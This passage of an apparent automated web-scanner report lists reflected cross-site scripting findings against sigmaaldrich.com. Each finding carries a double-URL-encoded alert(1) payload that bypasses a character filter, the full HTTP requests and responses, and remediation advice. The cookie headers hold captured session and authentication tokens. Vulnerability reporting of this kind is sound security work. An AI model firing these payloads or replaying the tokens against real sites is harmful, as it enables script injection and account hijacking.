P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:10 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28999


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc3fa38";alert(1)//e4a284d9a4d/medialib/sigma-aldrich/headers/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js","E404") ;
   </script>
...[SNIP]...

1.434. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/headers/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/headers/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5a9e%2522%253balert%25281%2529%252f%252f0ee5c7d588d was submitted in the REST URL parameter 2. This input was echoed as b5a9e";alert(1)//0ee5c7d588d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialibb5a9e%2522%253balert%25281%2529%252f%252f0ee5c7d588d/sigma-aldrich/headers/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/catalog/Lookup.do?N5=All&N3=mode+matchpartialmax&N4=%60&D7=0&D10=%60&N1=S_ID&ST=RS&N25=0&F=PR
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930574210&t2=1289930575333&t3=1289930582775&fti=1289930582775&fn=SearchForm%3A0%3Bemailfriend%3A1%3Bsearchsirnasidebox%3A2%3B&ac=0:S&fd=&uer=&fu=javascript%3AformHandlerTwo%28%29&pi=/content/sigma-aldrich/the-americas/united-states&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; bn_u=6923287736776754713

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:12 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28999


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialibb5a9e";alert(1)//0ee5c7d588d/sigma-aldrich/headers/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js","E404") ;
   </script>
...[SNIP]...

1.435. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/headers/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/headers/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6515%2522%253balert%25281%2529%252f%252fa34d166ad3e was submitted in the REST URL parameter 3. This input was echoed as d6515";alert(1)//a34d166ad3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrichd6515%2522%253balert%25281%2529%252f%252fa34d166ad3e/headers/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/catalog/Lookup.do?N5=All&N3=mode+matchpartialmax&N4=%60&D7=0&D10=%60&N1=S_ID&ST=RS&N25=0&F=PR
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930574210&t2=1289930575333&t3=1289930582775&fti=1289930582775&fn=SearchForm%3A0%3Bemailfriend%3A1%3Bsearchsirnasidebox%3A2%3B&ac=0:S&fd=&uer=&fu=javascript%3AformHandlerTwo%28%29&pi=/content/sigma-aldrich/the-americas/united-states&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; bn_u=6923287736776754713

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:16 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28999


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrichd6515";alert(1)//a34d166ad3e/headers/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js","E404") ;
   </script>
...[SNIP]...

1.436. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/headers/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/headers/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7683b%2522%253balert%25281%2529%252f%252f0f50d21c736 was submitted in the REST URL parameter 4. This input was echoed as 7683b";alert(1)//0f50d21c736 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/headers7683b%2522%253balert%25281%2529%252f%252f0f50d21c736/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/catalog/Lookup.do?N5=All&N3=mode+matchpartialmax&N4=%60&D7=0&D10=%60&N1=S_ID&ST=RS&N25=0&F=PR
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930574210&t2=1289930575333&t3=1289930582775&fti=1289930582775&fn=SearchForm%3A0%3Bemailfriend%3A1%3Bsearchsirnasidebox%3A2%3B&ac=0:S&fd=&uer=&fu=javascript%3AformHandlerTwo%28%29&pi=/content/sigma-aldrich/the-americas/united-states&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; bn_u=6923287736776754713

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:19 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28999


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/headers7683b";alert(1)//0f50d21c736/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js","E404") ;
   </script>
...[SNIP]...

1.437. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/headers/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/headers/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e4ca%2522%253balert%25281%2529%252f%252f6dca93d3432 was submitted in the REST URL parameter 5. This input was echoed as 6e4ca";alert(1)//6dca93d3432 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/headers/endeca-search-and6e4ca%2522%253balert%25281%2529%252f%252f6dca93d3432/event-minjs.Par.0001.File.tmp/event-min.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/catalog/Lookup.do?N5=All&N3=mode+matchpartialmax&N4=%60&D7=0&D10=%60&N1=S_ID&ST=RS&N25=0&F=PR
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930574210&t2=1289930575333&t3=1289930582775&fti=1289930582775&fn=SearchForm%3A0%3Bemailfriend%3A1%3Bsearchsirnasidebox%3A2%3B&ac=0:S&fd=&uer=&fu=javascript%3AformHandlerTwo%28%29&pi=/content/sigma-aldrich/the-americas/united-states&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; bn_u=6923287736776754713

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:21 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28999


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/headers/endeca-search-and6e4ca";alert(1)//6dca93d3432/event-minjs.Par.0001.File.tmp/event-min.js","E404") ;
   </script>
...[SNIP]...

1.438. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/headers/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/headers/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fede1%2522%253balert%25281%2529%252f%252f4fb6dc7d47d was submitted in the REST URL parameter 6. This input was echoed as fede1";alert(1)//4fb6dc7d47d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/headers/endeca-search-and/fede1%2522%253balert%25281%2529%252f%252f4fb6dc7d47d/event-min.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/catalog/Lookup.do?N5=All&N3=mode+matchpartialmax&N4=%60&D7=0&D10=%60&N1=S_ID&ST=RS&N25=0&F=PR
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930574210&t2=1289930575333&t3=1289930582775&fti=1289930582775&fn=SearchForm%3A0%3Bemailfriend%3A1%3Bsearchsirnasidebox%3A2%3B&ac=0:S&fd=&uer=&fu=javascript%3AformHandlerTwo%28%29&pi=/content/sigma-aldrich/the-americas/united-states&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; bn_u=6923287736776754713

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:24 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28970


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/headers/endeca-search-and/fede1";alert(1)//4fb6dc7d47d/event-min.js","E404") ;
   </script>
...[SNIP]...

1.439. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/icon-literature [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/icon-literature

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0d92%2522%253balert%25281%2529%252f%252fc414cbb18ad was submitted in the REST URL parameter 1. This input was echoed as e0d92";alert(1)//c414cbb18ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etce0d92%2522%253balert%25281%2529%252f%252fc414cbb18ad/medialib/sigma-aldrich/icon-literature HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:44 GMT
Content-Length: 28946
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etce0d92";alert(1)//c414cbb18ad/medialib/sigma-aldrich/icon-literature","E404") ;
   </script>
...[SNIP]...

1.440. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/icon-literature [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/icon-literature

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91e58%2522%253balert%25281%2529%252f%252f3437fea45bd was submitted in the REST URL parameter 2. This input was echoed as 91e58";alert(1)//3437fea45bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib91e58%2522%253balert%25281%2529%252f%252f3437fea45bd/sigma-aldrich/icon-literature HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; 